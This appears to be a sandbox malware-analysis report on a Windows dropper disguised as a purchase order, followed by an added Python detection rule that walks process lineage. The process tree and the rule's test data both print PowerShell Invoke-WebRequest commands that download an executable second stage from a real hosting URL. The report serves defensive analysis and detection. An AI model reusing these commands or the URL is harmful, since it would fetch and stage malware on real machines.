Analysis
max time kernel: 122s
max time network: 129s
platform: windows7_x64
resource: win7-20240705-en
resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
submitted: 30-07-2024 02:36
Static task: static1
Behavioral task: behavioral1
Sample: jdconstructnOrderfdp..exe
Resource: win7-20240705-en
General
Target: jdconstructnOrderfdp..exe
Size: 288KB
MD5: 7e900eb50f9dc1cb5c68ffea4b9e7bcc
SHA1: 4dcc14dc2b98fbc171308fb55b5b8551dd96ea96
SHA256: 8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3
SHA512: a77aeffc4f80358940e40789a67f67df5adc1bde4790a400665a98871498b10c3206981d3f18efa1149c9ec246f0343d133dd77de4f5a1f5816506a204276b1a
SSDEEP: 3072:6q6+ouCpk2mpcWJ0r+QNTBfRuk1qXkXRA4XTZK:6ldk1cWQRNTBpd8t
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell
Processes:
pid | process
2660 | powershell.exe
2332 | powershell.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | jdconstructnOrderfdp..exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
pid | process
2660 | powershell.exe
2332 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 2660 | powershell.exe
Token: SeDebugPrivilege | 2332 | powershell.exe
-
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
description | pid | process | target process | occurrences
PID 2700 wrote to memory of 1376 | 2700 | jdconstructnOrderfdp..exe | cmd.exe | 4
PID 1376 wrote to memory of 2660 | 1376 | cmd.exe | powershell.exe | 3
PID 1376 wrote to memory of 2332 | 1376 | cmd.exe | powershell.exe | 3
Processes
-
[depth 1] C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe
  command line: "C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"
  PID: 2700
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  [depth 2] C:\Windows\system32\cmd.exe
    command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\338E.tmp\338F.tmp\3390.bat C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"
    PID: 1376
    - Suspicious use of WriteProcessMemory
    [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"
      PID: 2660
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/networkrunfdp.exe' -OutFile networkrunfdp.exe"
      PID: 2332
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
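The process tree above is a three-stage download chain: an executable running from the user's %TEMP% directory launches cmd.exe on a .bat file that sits in a nested .tmp folder under %TEMP%, and that batch script calls PowerShell twice with Invoke-WebRequest -OutFile, once for purchaseOrder.jpg and once for the executable networkrunfdp.exe. The block below is an added detection example written for this page, not code from the sandbox report or its vendor. It runs over constructed Sysmon Event ID 1 style process-creation records (ProcessId, ParentProcessId, Image, CommandLine) modelled on the tree, walks each powershell.exe download back through its parent and grandparent, and grades the finding by lineage. Everything beyond the four processes in the report is an assumption: the explorer.exe parent pid 1100, the benign control pid 3000, the pid 3100 event with its example.invalid URL, the three severity tiers, and the function names EVENTS, ancestry and find_download_chains.

```python
"""Grade PowerShell download-to-disk calls by process lineage, using constructed
Sysmon Event ID 1 style records modelled on the sandbox report's process tree.
Added example; not code from the report."""
import re
from typing import Dict, List

# Constructed events, not a real log export.  PIDs, images and command lines for
# 2700/1376/2660/2332 follow the report; pid 1100 (assumed explorer.exe, no event
# recorded) and pids 3000/3100 are assumptions added to exercise the other tiers.
EVENTS: List[Dict] = [
    {"ProcessId": 2700, "ParentProcessId": 1100,
     "Image": r"C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe",
     "CommandLine": r'"C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"'},
    {"ProcessId": 1376, "ParentProcessId": 2700,
     "Image": r"C:\Windows\system32\cmd.exe",
     "CommandLine": r'"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp'
                    r'\338E.tmp\338F.tmp\3390.bat C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"'},
    {"ProcessId": 2660, "ParentProcessId": 1376,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "Powershell -Command \"Invoke-WebRequest "
                    "'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' "
                    "-OutFile purchaseOrder.jpg\""},
    {"ProcessId": 2332, "ParentProcessId": 1376,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "Powershell -Command \"Invoke-WebRequest "
                    "'https://jdvdpconstructionltdfileportal.replit.app/networkrunfdp.exe' "
                    "-OutFile networkrunfdp.exe\""},
    # Assumed benign control: interactive PowerShell with no download at all.
    {"ProcessId": 3000, "ParentProcessId": 1100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -Command "Get-Process | Sort-Object CPU"'},
    # Assumed: an executable download with no .bat / %TEMP% lineage visible.
    {"ProcessId": 3100, "ParentProcessId": 1100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -Command "iwr -Uri https://example.invalid/tool.exe -OutFile tool.exe"'},
]

# Invoke-WebRequest and its Windows PowerShell 5.1 aliases (iwr, wget, curl), with
# an optional -Uri and a required -OutFile so only download-to-disk calls match.
WEB_DOWNLOAD = re.compile(
    r"\b(?:Invoke-WebRequest|iwr|wget|curl)\s+(?:-Uri\s+)?['\"]?(?P<url>https?://[^\s'\"]+)['\"]?"
    r".*?-OutFile\s+['\"]?(?P<out>[^\s'\"]+)",
    re.IGNORECASE,
)
BAT_IN_TEMP = re.compile(r"\\AppData\\Local\\Temp\\[^\s\"]+\.bat\b", re.IGNORECASE)
TEMP_IMAGE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
EXEC_EXT = (".exe", ".dll", ".scr", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".hta")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(by_pid: Dict[int, Dict], pid: int, depth: int = 3) -> List[Dict]:
    """Return [process, parent, grandparent, ...] up to `depth` entries,
    stopping as soon as a parent pid has no recorded creation event."""
    chain: List[Dict] = []
    while pid in by_pid and len(chain) < depth:
        ev = by_pid[pid]
        chain.append(ev)
        pid = ev["ParentProcessId"]
    return chain


def find_download_chains(events: List[Dict]) -> List[Dict]:
    """Flag powershell.exe download-to-disk calls and grade them by lineage:
    high   - launched by cmd.exe running a .bat in %TEMP% whose own parent image
             lives in %TEMP% (the exact chain in the report)
    medium - .bat launcher without the %TEMP% parent, or the saved file carries
             an executable extension
    low    - any other Invoke-WebRequest -OutFile"""
    by_pid = {e["ProcessId"]: e for e in events}
    findings: List[Dict] = []
    for ev in events:
        if basename(ev["Image"]) != "powershell.exe":
            continue
        m = WEB_DOWNLOAD.search(ev["CommandLine"])
        if not m:
            continue
        chain = ancestry(by_pid, ev["ProcessId"])
        parent = chain[1] if len(chain) > 1 else None
        grandparent = chain[2] if len(chain) > 2 else None
        bat_launcher = bool(parent and basename(parent["Image"]) == "cmd.exe"
                            and BAT_IN_TEMP.search(parent["CommandLine"]))
        temp_root = bool(grandparent and TEMP_IMAGE.search(grandparent["Image"]))
        outfile = m.group("out")
        if bat_launcher and temp_root:
            severity = "high"
        elif bat_launcher or outfile.lower().endswith(EXEC_EXT):
            severity = "medium"
        else:
            severity = "low"
        findings.append({"pid": ev["ProcessId"],
                         "chain": [c["ProcessId"] for c in chain],
                         "url": m.group("url"), "outfile": outfile,
                         "severity": severity})
    return findings


if __name__ == "__main__":
    for f in find_download_chains(EVENTS):
        print(f"{f['severity']:6} pid={f['pid']} chain={f['chain']} {f['url']} -> {f['outfile']}")
```

On the constructed events both report PowerShell processes come out as high with chain [pid, 1376, 2700], the Get-Process control produces nothing, and the assumed pid 3100 download lands at medium because only the .exe extension, not the lineage, is suspicious. The lineage walk stops at the first parent with no creation event, so on a real host the rule depends on process-creation logging having been enabled before the dropper ran.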
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize: 334B
MD5: 9aaac0122442ca0ebb4d8bb795e86676
SHA1: 594744d8e4d51273dd435c3fac5799bc5f180e8c
SHA256: 6af7e75e339241dac26eca99aa1290c1f420b45b4231212d20adf08aa287e373
SHA512: d08a0dd3b40d80c7582c3f69a7868371e7eb03ac6f4658a39e7a9fb1dd34cc22a5e91d60b31af71c77cebfe0fd0c3827fdbb3cc35224189388345c61e756636c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: b310916d9f3f5fb99bb03ca1fc8a1d07
SHA1: 5ff09f5fa270422f54de0827799bccdc28cbdff4
SHA256: 665df35895f7174811a9d4c87a756924ed2eb1749575de0e25d85be00c905ae0
SHA512: 6889b550877ed6928fcb7106d4de4ae5a5445e2995767b6676452f300046c403283d21570efbcdfe455088a4c01d049bc2253287064e2c828e3700d3b0b34da5